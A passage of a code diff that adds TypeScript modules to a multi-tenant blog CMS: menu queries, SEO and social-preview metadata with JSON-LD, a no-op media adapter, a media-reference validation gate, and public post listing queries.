+/** Read/write query module for `awcms_blog_menus`/`_menu_items` (Issue #542) — same "one directory, reads and writes" convention as `blog-taxonomy-directory.ts`. */
+export type BlogMenuView = {
+  id: string;
+  tenantId: string;
+  key: string;
+  name: string;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type BlogMenuRow = {
+  id: string;
+  tenant_id: string;
+  key: string;
+  name: string;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toMenuView(row: BlogMenuRow): BlogMenuView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    key: row.key,
+    name: row.name,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export type BlogMenuItemView = {
+  id: string;
+  tenantId: string;
+  menuId: string;
+  parentItemId: string | null;
+  label: string;
+  linkType: MenuLinkType;
+  targetId: string | null;
+  url: string | null;
+  sortOrder: number;
+};
+
+type BlogMenuItemRow = {
+  id: string;
+  tenant_id: string;
+  menu_id: string;
+  parent_item_id: string | null;
+  label: string;
+  link_type: MenuLinkType;
+  target_id: string | null;
+  url: string | null;
+  sort_order: number;
+};
+
+function toItemView(row: BlogMenuItemRow): BlogMenuItemView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    menuId: row.menu_id,
+    parentItemId: row.parent_item_id,
+    label: row.label,
+    linkType: row.link_type,
+    targetId: row.target_id,
+    url: row.url,
+    sortOrder: row.sort_order
+  };
+}
+
+export async function createMenu(
+  tx: Bun.SQL,
+  tenantId: string,
+  key: string,
+  name: string
+): Promise<BlogMenuView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_menus (tenant_id, key, name)
+    VALUES (${tenantId}, ${key}, ${name})
+    RETURNING id, tenant_id, key, name, created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogMenuRow[];
+
+  return toMenuView(rows[0]!);
+}
+
+export async function fetchMenuById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<BlogMenuView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, key, name, created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_menus
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as BlogMenuRow[];
+
+  const row = rows[0];
+  return row ? toMenuView(row) : null;
+}
+
+export async function listMenus(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<BlogMenuView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, key, name, created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_menus
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+    ORDER BY name ASC
+    LIMIT 100
+  `) as BlogMenuRow[];
+
+  return rows.map(toMenuView);
+}
+
+export async function updateMenu(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  name: string | undefined
+): Promise<BlogMenuView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_menus
+    SET name = COALESCE(${name ?? null}, name), updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, key, name, created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogMenuRow[];
+
+  return rows[0] ? toMenuView(rows[0]) : null;
+}
+
+export async function softDeleteMenu(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_menus
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}
+
+/**
+ * Full replace semantics (delete all existing items for the menu, then
+ * insert the given set) — same "PATCH replaces the whole sub-resource"
+ * convention `syncPostTermAssignments` uses for `termIds`. Every item's
+ * `id` is **client-supplied**, not `DEFAULT gen_random_uuid()` — the old
+ * DB-generated ids from a previous sync are gone the moment `DELETE` runs
+ * above, so `parentItemId` can only ever resolve against ids the caller
+ * itself provides in this same payload (`domain/menu-policy.ts`'s
+ * `validateMenuItemsInput` already checked every `parentItemId` resolves
+ * within the batch and nests at most one level deep). Inserted
+ * roots-before-children so a child's FK to its parent is always satisfied
+ * by the time it's inserted.
+ */
+export async function syncMenuItems(
+  tx: Bun.SQL,
+  tenantId: string,
+  menuId: string,
+  items: readonly MenuItemInput[]
+): Promise<BlogMenuItemView[]> {
+  await tx`
+    DELETE FROM awcms_blog_menu_items
+    WHERE tenant_id = ${tenantId} AND menu_id = ${menuId}
+  `;
+
+  const roots = items.filter((item) => item.parentItemId === null);
+  const children = items.filter((item) => item.parentItemId !== null);
+  const inserted: BlogMenuItemRow[] = [];
+
+  for (const item of [...roots, ...children]) {
+    const rows = (await tx`
+      INSERT INTO awcms_blog_menu_items
+        (id, tenant_id, menu_id, parent_item_id, label, link_type, target_id, url, sort_order)
+      VALUES (
+        ${item.id}, ${tenantId}, ${menuId}, ${item.parentItemId}, ${item.label},
+        ${item.linkType}, ${item.targetId}, ${item.url}, ${item.sortOrder}
+      )
+      RETURNING id, tenant_id, menu_id, parent_item_id, label, link_type, target_id, url, sort_order
+    `) as BlogMenuItemRow[];
+
+    inserted.push(rows[0]!);
+  }
+
+  return inserted.map(toItemView);
+}
+
+export async function fetchMenuItems(
+  tx: Bun.SQL,
+  tenantId: string,
+  menuId: string
+): Promise<BlogMenuItemView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, menu_id, parent_item_id, label, link_type, target_id, url, sort_order
+    FROM awcms_blog_menu_items
+    WHERE tenant_id = ${tenantId} AND menu_id = ${menuId}
+    ORDER BY sort_order ASC
+  `) as BlogMenuItemRow[];
+
+  return rows.map(toItemView);
+}

--- a/src/modules/blog-content/application/news-article-seo-metadata.ts
+++ b/src/modules/blog-content/application/news-article-seo-metadata.ts
@@ -1,0 +1,263 @@
+/**
+ * Application-layer orchestration for Issue #649's full SEO/social preview
+ * metadata on a public post detail page — the single place that bulk-
+ * resolves every candidate media object id (featured image, explicit SEO
+ * image override, gallery images, video thumbnails, tenant fallback social
+ * image) in ONE `NewsMediaPort.resolveMediaReferences` call, picks the
+ * winning social preview image via the pure priority chain
+ * (`social-preview-image-resolution.ts`), and builds the `NewsArticle`
+ * JSON-LD object. Shared by BOTH public post detail routes (`/news/[slug].ts`,
+ * `/blog/[tenantCode]/[slug].ts`) so they can never silently diverge on how
+ * the image/robots/structured-data metadata is derived — same "one
+ * orchestration function, route only wires I/O" convention
+ * `content-quality-checklist-gate.ts` and `news-media-reference-gate.ts`
+ * already established for this epic.
+ */
+import type { NewsMediaPort } from "../../_shared/ports/news-media-port";
+import type { PublicBlogPostDetail } from "./public-blog-directory";
+import { fetchPublicPostTaxonomyTerms } from "./public-blog-directory";
+import type { BlogSettingsView } from "./blog-settings-directory";
+import {
+  collectRenderableGalleryMediaObjectIds,
+  collectRenderableVideoNewsThumbnailMediaObjectIds
+} from "../domain/content-block-rendering";
+import {
+  resolveSocialPreviewImageSourceId,
+  type SocialPreviewImageCandidates
+} from "../domain/social-preview-image-resolution";
+import {
+  deriveArticleSectionAndTags,
+  resolveOgImageUrl,
+  resolveRobotsMetaContent
+} from "../domain/seo-rendering";
+import { buildNewsArticleJsonLd } from "../domain/structured-data-rendering";
+
+export type NewsArticleSeoMetadataInput = {
+  post: PublicBlogPostDetail;
+  tenantName: string;
+  /** Already-resolved via `resolveCanonicalUrl` — `null` means JSON-LD is omitted entirely (`mainEntityOfPage`/`@id` requires a real URL). */
+  canonicalUrl: string | null;
+  /** Already-resolved via `resolveSeoTitle` — used as JSON-LD `headline`. */
+  seoTitle: string;
+  /** Already-resolved via `resolveMetaDescription` — used as JSON-LD `description`. */
+  metaDescription: string;
+};
+
+export type NewsArticleSeoMetadata = {
+  /** `mediaObjectId -> publicUrl`, for `renderContentJsonToHtml`'s gallery/video-thumbnail rendering — same map shape every existing caller already builds, now built once here instead of per-route. */
+  resolvedGalleryUrls: ReadonlyMap<string, string>;
+  ogImageUrl: string | null;
+  ogImageAlt: string | null;
+  ogImageMimeType: string | null;
+  ogImageWidth: number | null;
+  ogImageHeight: number | null;
+  robotsContent: string;
+  articleSection: string | null;
+  articleTags: string[];
+  /** `null` when `canonicalUrl` was `null` — no safe `mainEntityOfPage` to point at. */
+  structuredDataJsonLd: Record<string, unknown> | null;
+};
+
+export async function buildNewsArticleSeoMetadata(
+  tx: Bun.SQL,
+  tenantId: string,
+  mediaPort: NewsMediaPort,
+  blogSettings: BlogSettingsView,
+  input: NewsArticleSeoMetadataInput
+): Promise<NewsArticleSeoMetadata> {
+  const galleryMediaObjectIds = collectRenderableGalleryMediaObjectIds(
+    input.post.contentJson
+  );
+  const videoThumbnailMediaObjectIds =
+    collectRenderableVideoNewsThumbnailMediaObjectIds(input.post.contentJson);
+
+  const candidateIds = new Set<string>();
+  if (input.post.featuredMediaId) {
+    candidateIds.add(input.post.featuredMediaId);
+  }
+  if (input.post.seoImageMediaId) {
+    candidateIds.add(input.post.seoImageMediaId);
+  }
+  for (const id of galleryMediaObjectIds) {
+    candidateIds.add(id);
+  }
+  for (const id of videoThumbnailMediaObjectIds) {
+    candidateIds.add(id);
+  }
+  if (blogSettings.socialPreviewFallbackImageMediaId) {
+    candidateIds.add(blogSettings.socialPreviewFallbackImageMediaId);
+  }
+
+  const resolvedMedia = await mediaPort.resolveMediaReferences(tx, tenantId, [
+    ...candidateIds
+  ]);
+
+  const resolvedGalleryUrls = new Map(
+    [...resolvedMedia].map(([id, media]) => [id, media.publicUrl])
+  );
+
+  const socialPreviewCandidates: SocialPreviewImageCandidates = {
+    explicitSocialImageMediaId: input.post.seoImageMediaId,
+    featuredMediaId: input.post.featuredMediaId,
+    // Priority tier #3 ("first verified R2 image in content") deliberately
+    // considers only gallery-block images, never `video_news` block
+    // thumbnails — `videoThumbnailMediaObjectIds` is bulk-resolved above
+    // for `resolvedGalleryUrls` (the video thumbnail `<img>` itself needs
+    // it) but is intentionally excluded here: a video thumbnail is a
+    // still frame representing embedded video, not an editorial photo, so
+    // using it as the article's own social/SEO preview image would be a
+    // scope expansion beyond the issue's "image in content" wording, not
+    // an oversight.
+    contentImageMediaIds: blogSettings.socialPreviewContentImageFallbackEnabled
+      ? galleryMediaObjectIds
+      : [],
+    tenantFallbackImageMediaId: blogSettings.socialPreviewFallbackImageMediaId
+  };
+
+  const socialPreviewMediaId = resolveSocialPreviewImageSourceId(
+    socialPreviewCandidates,
+    new Set(resolvedMedia.keys())
+  );
+  const socialPreviewMedia = socialPreviewMediaId
+    ? (resolvedMedia.get(socialPreviewMediaId) ?? null)
+    : null;
+
+  const ogImageUrl = resolveOgImageUrl(socialPreviewMedia?.publicUrl ?? null);
+  const robotsContent = resolveRobotsMetaContent(input.post.visibility);
+
+  const terms = await fetchPublicPostTaxonomyTerms(tx, tenantId, input.post.id);
+  const { section, tags } = deriveArticleSectionAndTags(terms);
+
+  let structuredDataJsonLd: Record<string, unknown> | null = null;
+
+  if (input.canonicalUrl) {
+    // Best-effort publisher logo: reuse the tenant fallback social image if
+    // it resolved safely — this repo has no dedicated "tenant logo" concept,
+    // so a JSON-LD `publisher.logo` is omitted (not fabricated from an
+    // unverified source) when no fallback image is configured/resolved.
+    const fallbackLogoMedia = blogSettings.socialPreviewFallbackImageMediaId
+      ? (resolvedMedia.get(blogSettings.socialPreviewFallbackImageMediaId) ??
+        null)
+      : null;
+
+    structuredDataJsonLd = buildNewsArticleJsonLd({
+      headline: input.seoTitle,
+      description: input.metaDescription,
+      canonicalUrl: input.canonicalUrl,
+      image: ogImageUrl
+        ? {
+            url: ogImageUrl,
+            width: socialPreviewMedia?.width ?? null,
+            height: socialPreviewMedia?.height ?? null
+          }
+        : null,
+      datePublished: input.post.publishedAt,
+      dateModified: input.post.updatedAt,
+      authorName: input.tenantName,
+      publisherName: input.tenantName,
+      publisherLogoUrl: fallbackLogoMedia
+        ? resolveOgImageUrl(fallbackLogoMedia.publicUrl)
+        : null,
+      articleSection: section,
+      tags
+    });
+  }
+
+  return {
+    resolvedGalleryUrls,
+    ogImageUrl,
+    ogImageAlt: socialPreviewMedia?.altText ?? null,
+    ogImageMimeType: socialPreviewMedia?.mimeType ?? null,
+    ogImageWidth: socialPreviewMedia?.width ?? null,
+    ogImageHeight: socialPreviewMedia?.height ?? null,
+    robotsContent,
+    articleSection: section,
+    articleTags: tags,
+    structuredDataJsonLd
+  };
+}
+
+export type ResolvedNewsArticlePreviewImage = {
+  url: string;
+  mimeType: string;
+  width: number | null;
+  height: number | null;
+  sizeBytes: number | null;
+  altText: string | null;
+};
+
+/**
+ * Lighter-weight sibling of `buildNewsArticleSeoMetadata`, for RSS/sitemap
+ * rendering (Issue #649 — "RSS and sitemap/news sitemap should use...
+ * verified R2 preview images where applicable"): resolves ONLY the winning
+ * social preview image (same priority chain, same R2-verification
+ * primitive), without also fetching taxonomy terms or building JSON-LD —
+ * neither is needed for an RSS `<enclosure>`/sitemap `<image:image>` entry.
+ * Called once per feed/sitemap item (bounded by `FEED_ITEM_LIMIT`, currently
+ * 50) — each call is its own small bulk resolution (featured + SEO image +
+ * gallery + tenant fallback ids for ONE post), not a single combined query
+ * across the whole feed, matching this epic's existing per-post resolution
+ * granularity (`content-quality-checklist-gate.ts`'s scheduled-publish loop
+ * does the same "resolve per item" thing for a bounded batch).
+ */
+export async function resolveNewsArticlePreviewImage(
+  tx: Bun.SQL,
+  tenantId: string,
+  mediaPort: NewsMediaPort,
+  blogSettings: BlogSettingsView,
+  post: PublicBlogPostDetail
+): Promise<ResolvedNewsArticlePreviewImage | null> {
+  const galleryMediaObjectIds = collectRenderableGalleryMediaObjectIds(
+    post.contentJson
+  );
+
+  const candidateIds = new Set<string>();
+  if (post.featuredMediaId) {
+    candidateIds.add(post.featuredMediaId);
+  }
+  if (post.seoImageMediaId) {
+    candidateIds.add(post.seoImageMediaId);
+  }
+  for (const id of galleryMediaObjectIds) {
+    candidateIds.add(id);
+  }
+  if (blogSettings.socialPreviewFallbackImageMediaId) {
+    candidateIds.add(blogSettings.socialPreviewFallbackImageMediaId);
+  }
+
+  const resolvedMedia = await mediaPort.resolveMediaReferences(tx, tenantId, [
+    ...candidateIds
+  ]);
+
+  const chosenId = resolveSocialPreviewImageSourceId(
+    {
+      explicitSocialImageMediaId: post.seoImageMediaId,
+      featuredMediaId: post.featuredMediaId,
+      // Gallery images only, never video_news thumbnails — same deliberate
+      // scope decision as `buildNewsArticleSeoMetadata` above, see its
+      // comment for the full reasoning.
+      contentImageMediaIds:
+        blogSettings.socialPreviewContentImageFallbackEnabled
+          ? galleryMediaObjectIds
+          : [],
+      tenantFallbackImageMediaId: blogSettings.socialPreviewFallbackImageMediaId
+    },
+    new Set(resolvedMedia.keys())
+  );
+
+  const media = chosenId ? (resolvedMedia.get(chosenId) ?? null) : null;
+  const url = media ? resolveOgImageUrl(media.publicUrl) : null;
+
+  if (!media || !url) {
+    return null;
+  }
+
+  return {
+    url,
+    mimeType: media.mimeType,
+    width: media.width,
+    height: media.height,
+    sizeBytes: media.sizeBytes,
+    altText: media.altText
+  };
+}

--- a/src/modules/blog-content/application/news-media-port-noop-adapter.ts
+++ b/src/modules/blog-content/application/news-media-port-noop-adapter.ts
@@ -1,0 +1,58 @@
+/**
+ * PORT-TIME ADDITION (not present in awcms-mini) — a no-op `NewsMediaPort`
+ * implementation, injected at every composition root (route handler /
+ * `blog:publish:scheduled` worker) inside this module instead of
+ * `news-portal/application/news-media-port-adapter.ts`'s concrete adapter.
+ *
+ * `news_portal` is NOT ported to this base yet, so there is no
+ * `awcms_news_media_objects` registry, no full-online-R2-only-mode preset,
+ * and no real media object to ever resolve. Every method below reports the
+ * exact same "capability not present" answer a genuinely-disabled
+ * `news_portal` deployment already produces for a mini tenant that never
+ * enabled it:
+ *
+ *  - `isFullOnlineR2ModeActiveForTenant` -> always `false`. Every caller
+ *    (`news-media-reference-gate.ts`, `video-news-thumbnail-reference-
+ *    gate.ts`, `content-quality-checklist-gate.ts`) treats `false` as "this
+ *    entire check is a no-op" — featured/gallery/thumbnail image references
+ *    keep their pre-#636 unchanged behavior (any string id is accepted,
+ *    never fetched against a media registry that does not exist).
+ *  - `isMediaReferenceSafe` -> always `false` (fail-closed default; never
+ *    actually reached in practice since the mode check above always short-
+ *    circuits first).
+ *  - `resolveMediaReferences` -> always an empty map. Callers that resolve
+ *    unconditionally for rendering (`news-article-seo-metadata.ts`) treat a
+ *    missing id as "no image available" — the honest answer when there is
+ *    no media registry to resolve against, never a fabricated URL.
+ *  - `resolveMediaPublicBaseUrl` -> `""`, the port's own documented
+ *    "unset" value.
+ *
+ * Swapping this for the real `news-portal` adapter, once that module is
+ * ported, is a pure composition-root change — no file in this module needs
+ * to change (every call site already takes the port as an injected
+ * parameter, never imports an implementation itself).
+ */
+import type {
+  NewsMediaPort,
+  ResolvedNewsMediaReferenceDTO
+} from "../../_shared/ports/news-media-port";
+
+export const noopNewsMediaPortAdapter: NewsMediaPort = {
+  async isFullOnlineR2ModeActiveForTenant(): Promise<boolean> {
+    return false;
+  },
+
+  async isMediaReferenceSafe(): Promise<boolean> {
+    return false;
+  },
+
+  async resolveMediaReferences(): Promise<
+    ReadonlyMap<string, ResolvedNewsMediaReferenceDTO>
+  > {
+    return new Map();
+  },
+
+  resolveMediaPublicBaseUrl(): string {
+    return "";
+  }
+};

--- a/src/modules/blog-content/application/news-media-reference-gate.ts
+++ b/src/modules/blog-content/application/news-media-reference-gate.ts
@@ -1,0 +1,159 @@
+/**
+ * Application-layer enforcement of Issue #636 (epic `news_portal`): when
+ * full-online R2-only mode is active for the tenant making a request,
+ * `featuredMediaId` and every image-gallery block item must reference an
+ * existing, same-tenant, `verified`/`attached` row in the news media
+ * registry (Issue #633) — never a raw URL, never another tenant's object,
+ * never an unverified/failed/orphaned/deleted one.
+ *
+ * Deliberately NOT part of the pure validators in `blog-post-validation.ts`/
+ * `blog-page-validation.ts` — this needs a real database round trip, so it
+ * follows the exact same convention `countExistingTerms` already
+ * established for `termIds` (Issue #539): shape-only checks stay in the
+ * pure validator, existence/ownership checks run here, called from the
+ * route handler AFTER pure validation passes and BEFORE the post/page is
+ * written — so a request that fails this check never creates a
+ * partially-written row.
+ *
+ * When full-online R2-only mode is NOT active for the tenant (the
+ * overwhelming majority of deployments/tenants today), this entire check
+ * is a no-op — `featuredMediaId`/gallery `url` fields keep their existing,
+ * unchanged, pre-#636 behavior. This is intentionally conditional, not a
+ * blanket tightening of `blog_content` itself (issue's own "Security
+ * notes": enforce hard in R2-only mode, but the mode itself stays opt-in).
+ *
+ * Issue #681 (epic #679, platform-hardening) — this file previously
+ * imported `news-portal/application/news-media-object-directory.ts` and
+ * `news-portal/application/news-portal-tenant-state.ts`/`domain/
+ * news-portal-preset-readiness.ts` (via `news-portal-r2-mode-gate.ts`)
+ * directly, a genuine `blog_content` application-layer import of
+ * `news_portal`'s implementation. Both are now accessed only through
+ * `_shared/ports/news-media-port.ts`'s `NewsMediaPort` interface, injected
+ * by the caller — the route handler (composition root) imports the
+ * concrete adapter (`news-portal/application/news-media-port-adapter.ts`)
+ * and passes it in. `resolveVerifiedNewsMediaReferences` (the render-time
+ * resolution half of this file, before this issue) is GONE — every caller
+ * (this module's own public detail routes, `news_portal`'s homepage
+ * composer) now calls `NewsMediaPort.resolveMediaReferences` directly,
+ * since that IS the port's own capability with nothing left for this file
+ * to add on top.
+ */
+import {
+  collectGalleryImageReferences,
+  type GalleryImageReferenceViolation
+} from "../domain/content-block-media-references";
+import type { NewsMediaPort } from "../../_shared/ports/news-media-port";
+
+export type NewsMediaReferenceValidationError = {
+  field: string;
+  message: string;
+};
+
+export type NewsMediaReferenceValidationResult =
+  | { valid: true }
+  | { valid: false; errors: NewsMediaReferenceValidationError[] };
+
+function violationMessage(violation: GalleryImageReferenceViolation): string {
+  const prefix = `contentJson.blocks[].items[${violation.itemIndex}]`;
+
+  if (violation.reason === "raw_url_not_allowed") {
+    return `${prefix}: image gallery items must use "mediaObjectId" (a verified R2 media object), not a raw "url", in full-online R2-only mode.`;
+  }
+
+  return `${prefix}: image gallery items require a valid "mediaObjectId" (UUID) in full-online R2-only mode.`;
+}
+
+/**
+ * Runs inside the caller's own tenant-scoped transaction (same `tx` the
+ * route handler already opened via `withTenant`). `mediaPort` is the
+ * caller-injected `NewsMediaPort` implementation — every existence check
+ * below is naturally tenant-scoped by the port's own `tenantId` parameter,
+ * so a cross-tenant `mediaObjectId` simply resolves to "unsafe", never
+ * leaking whether the id belongs to a different tenant.
+ */
+export async function validateNewsMediaReferencesForFullOnlineR2Mode(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: {
+    featuredMediaId: string | null | undefined;
+    /** Issue #649 — same existence/ownership/verified-status check as `featuredMediaId`, for the explicit SEO/social preview image override. */
+    seoImageMediaId?: string | null | undefined;
+    contentJson: Record<string, unknown> | undefined;
+  },
+  mediaPort: NewsMediaPort,
+  env: NodeJS.ProcessEnv = process.env
+): Promise<NewsMediaReferenceValidationResult> {
+  const modeActive = await mediaPort.isFullOnlineR2ModeActiveForTenant(
+    tx,
+    tenantId,
+    env
+  );
+
+  if (!modeActive) {
+    return { valid: true };
+  }
+
+  const errors: NewsMediaReferenceValidationError[] = [];
+
+  if (input.featuredMediaId) {
+    const safe = await mediaPort.isMediaReferenceSafe(
+      tx,
+      tenantId,
+      input.featuredMediaId
+    );
+
+    if (!safe) {
+      errors.push({
+        field: "featuredMediaId",
+        message:
+          "featuredMediaId must reference an existing, verified R2 media object belonging to this tenant in full-online R2-only mode."
+      });
+    }
+  }
+
+  if (input.seoImageMediaId) {
+    const safe = await mediaPort.isMediaReferenceSafe(
+      tx,
+      tenantId,
+      input.seoImageMediaId
+    );
+
+    if (!safe) {
+      errors.push({
+        field: "seoImageMediaId",
+        message:
+          "seoImageMediaId must reference an existing, verified R2 media object belonging to this tenant in full-online R2-only mode."
+      });
+    }
+  }
+
+  if (input.contentJson) {
+    const { mediaObjectIds, violations } = collectGalleryImageReferences(
+      input.contentJson
+    );
+
+    for (const violation of violations) {
+      errors.push({
+        field: "contentJson",
+        message: violationMessage(violation)
+      });
+    }
+
+    for (const mediaObjectId of mediaObjectIds) {
+      const safe = await mediaPort.isMediaReferenceSafe(
+        tx,
+        tenantId,
+        mediaObjectId
+      );
+
+      if (!safe) {
+        errors.push({
+          field: "contentJson",
+          message: `contentJson references mediaObjectId "${mediaObjectId}" which does not exist, does not belong to this tenant, or is not a verified R2 media object.`
+        });
+      }
+    }
+  }
+
+  return errors.length > 0 ? { valid: false, errors } : { valid: true };
+}

--- a/src/modules/blog-content/application/public-blog-directory.ts
+++ b/src/modules/blog-content/application/public-blog-directory.ts
@@ -1,0 +1,393 @@
+/**
+ * Public (anonymous) read queries for `awcms_blog_posts` (Issue
+ * #540). Every function here enforces tenant scoping via an explicit
+ * `tenant_id = $1` predicate (the caller connects via the least-privilege
+ * app role with RLS FORCE'd — same defense-in-depth convention as every
+ * other tenant-scoped query in this repo) and a public-visibility
+ * predicate — never the admin `blog-post-directory.ts` functions, which
+ * assume an authenticated+authorized caller.
+ *
+ * Two distinct predicates, both from doc issue #540:
+ * - **Listing** (index/category/tag archive/feed/sitemap):
+ *   `status = 'published' AND visibility = 'public' AND deleted_at IS NULL
+ *   AND published_at IS NOT NULL AND published_at <= now()` — the exact
+ *   predicate #539's `searchPublicBlogContent` already implements.
+ * - **Detail** (single post by slug): same, but `visibility IN ('public',
+ *   'unlisted')` — doc issue #540's acceptance criteria explicitly scope
+ *   the unlisted exclusion to "listing/search/feed/sitemap" only, meaning
+ *   an unlisted post *is* reachable by direct link (that is the entire
+ *   point of the "unlisted" tier existing separately from "private",
+ *   which is never publicly reachable at all).
+ */
+import type { BlogContentVisibility } from "../domain/post-status";
+import {
+  boundedPageNumber,
+  boundedPageSize as sharedBoundedPageSize
+} from "../../_shared/offset-pagination";
+export type PublicBlogPostDetail = {
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  locale: string;
+  publishedAt: Date;
+  /** Issue #649 — `dateModified` for JSON-LD `NewsArticle` structured data. */
+  updatedAt: Date;
+  /** Issue #649 — `public` renders indexable metadata (`index,follow,...`); `unlisted` (reachable by direct link only, excluded from listings/sitemap/feed) renders `noindex,nofollow`. `private` never reaches this far (`fetchPublicBlogPostBySlug`'s own predicate excludes it). */
+  visibility: BlogContentVisibility;
+  /** Issue #636 — added so public detail routes can resolve it to a verified R2 media object for gallery/og:image rendering (`resolveVerifiedNewsMediaReferences`). Not previously selected here since nothing rendered it before this issue. */
+  featuredMediaId: string | null;
+  /** Issue #641 — per-post opt-out of automatic internal tag linking, read by the public detail routes before calling `renderContentHtmlWithInternalTagLinks`. */
+  autoInternalTagLinksDisabled: boolean;
+  /** Issue #649 — explicit "use this image for social/SEO preview" override; highest priority source in `social-preview-image-resolution.ts`'s chain, ahead of `featuredMediaId`. */
+  seoImageMediaId: string | null;
+};
+
+type PublicBlogPostDetailRow = {
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  content_json: Record<string, unknown>;
+  content_text: string;
+  seo_title: string | null;
+  meta_description: string | null;
+  canonical_url: string | null;
+  locale: string;
+  published_at: Date;
+  updated_at: Date;
+  visibility: BlogContentVisibility;
+  featured_media_id: string | null;
+  auto_internal_tag_links_disabled: boolean;
+  seo_image_media_id: string | null;
+};
+
+function toDetail(row: PublicBlogPostDetailRow): PublicBlogPostDetail {
+  return {
+    id: row.id,
+    title: row.title,
+    slug: row.slug,
+    excerpt: row.excerpt,
+    contentJson: row.content_json,
+    contentText: row.content_text,
+    seoTitle: row.seo_title,
+    metaDescription: row.meta_description,
+    canonicalUrl: row.canonical_url,
+    locale: row.locale,
+    publishedAt: row.published_at,
+    updatedAt: row.updated_at,
+    visibility: row.visibility,
+    featuredMediaId: row.featured_media_id,
+    autoInternalTagLinksDisabled: row.auto_internal_tag_links_disabled,
+    seoImageMediaId: row.seo_image_media_id
+  };
+}
+
+export async function fetchPublicBlogPostBySlug(
+  tx: Bun.SQL,
+  tenantId: string,
+  slug: string
+): Promise<PublicBlogPostDetail | null> {
+  const rows = (await tx`
+    SELECT id, title, slug, excerpt, content_json, content_text, seo_title,
+      meta_description, canonical_url, locale, published_at, updated_at,
+      visibility, featured_media_id, auto_internal_tag_links_disabled,
+      seo_image_media_id
+    FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId} AND slug = ${slug}
+      AND status = 'published' AND visibility IN ('public', 'unlisted')
+      AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()
+    ORDER BY published_at DESC
+    LIMIT 1
+  `) as PublicBlogPostDetailRow[];
+
+  const row = rows[0];
+  return row ? toDetail(row) : null;
+}
+
+export type PublicBlogPostSummary = {
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  publishedAt: Date;
+  /** Issue #637 — added so homepage section cards can resolve it to a verified R2 media object, same reason #636 added it to `PublicBlogPostDetail`. Not selected by every query below (only where a caller actually renders an image). */
+  featuredMediaId: string | null;
+};
+
+type PublicBlogPostSummaryRow = {
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  published_at: Date;
+  featured_media_id: string | null;
+};
+
+function toSummary(row: PublicBlogPostSummaryRow): PublicBlogPostSummary {
+  return {
+    id: row.id,
+    title: row.title,
+    slug: row.slug,
+    excerpt: row.excerpt,
+    publishedAt: row.published_at,
+    featuredMediaId: row.featured_media_id
+  };
+}
+
+export type PublicBlogPostPage = {
+  items: PublicBlogPostSummary[];
+  hasNextPage: boolean;
+};
+
+const DEFAULT_PAGE_SIZE = 10;
+const MAX_PAGE_SIZE = 50;
+
+function boundedPageSize(pageSize: number | undefined): number {
+  return sharedBoundedPageSize(pageSize, DEFAULT_PAGE_SIZE, MAX_PAGE_SIZE);
+}
+
+/**
+ * Clamped at both ends via the shared helper (Issue #819) — these routes are
+ * public and unauthenticated, so an unbounded `page` was a one-request
+ * deep-offset scan (`?page=1e8` → `OFFSET 1e9`) and `NaN` was a 500.
+ */
+function boundedPage(page: number | undefined): number {
+  return boundedPageNumber(page);
+}
+
+/** Standard `?page=` (1-indexed) pagination — fetches `pageSize + 1` rows to derive `hasNextPage` without a separate `COUNT(*)` query, same "one extra row" trick used for cursor pagination elsewhere in this repo. */
+export async function listPublicBlogPosts(
+  tx: Bun.SQL,
+  tenantId: string,
+  options: { page?: number; pageSize?: number } = {}
+): Promise<PublicBlogPostPage> {
+  const pageSize = boundedPageSize(options.pageSize);
+  const page = boundedPage(options.page);
+  const offset = (page - 1) * pageSize;
+
+  const rows = (await tx`
+    SELECT id, title, slug, excerpt, published_at, featured_media_id
+    FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId}
+      AND status = 'published' AND visibility = 'public'
+      AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()
+    ORDER BY published_at DESC
+    LIMIT ${pageSize + 1} OFFSET ${offset}
+  `) as PublicBlogPostSummaryRow[];
+
+  const hasNextPage = rows.length > pageSize;
+
+  return {
+    items: rows.slice(0, pageSize).map(toSummary),
+    hasNextPage
+  };
+}
+
+export type PublicTermSummary = {
+  id: string;
+  taxonomyType: string;
+  name: string;
+  slug: string;
+  description: string | null;
+};
+
